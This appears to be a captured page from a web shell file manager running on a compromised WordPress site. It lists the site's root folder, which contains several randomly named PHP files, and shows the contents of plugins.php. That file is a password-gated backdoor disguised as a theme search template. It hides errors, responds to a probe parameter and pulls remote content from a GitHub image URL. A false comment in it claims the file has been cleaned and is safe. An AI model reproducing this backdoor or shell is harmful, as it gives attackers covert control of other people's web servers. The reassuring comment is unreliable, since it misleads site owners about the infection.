📁
SKYSHELL MANAGER
PHP v8.2.33
Create
Create
Path:
root
/
home
/
u658903775
/
domains
/
satgurusweets.ca
/
public_html
/
Name
Size
Perm
Actions
📁
.tmb
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0555
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.06 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.bk
1.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
default.php
15.99 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
fl.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
framework.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.45 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ok.txt
0.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.24 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.36 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
sgz-86xwmj.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
sgz-8nvwee.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
sgz-hiw2nd.php
24.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-9vc1bt.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
2.96 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.51 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-otqanx.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
28.1 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
4.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-uyjq3a.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-xry1oj.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.17 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
z.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: plugins.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php /* * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://wordpress.org/themes/template/ * @package WordPress * @subpackage * @since 1.0 */ $l = "https://user-images.githubusercontent.com/143735067/264713238-ae810af4-c98d-421f-bbb3-1ddcc58f952a.jpg"/* "" - ni*/; //DX for each form and a string if( function_exists('curl_init') ) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $l); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"); $body = curl_exec($ch); curl_close($ch); } else { $body = @file_get_contents($l); } /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?>
Save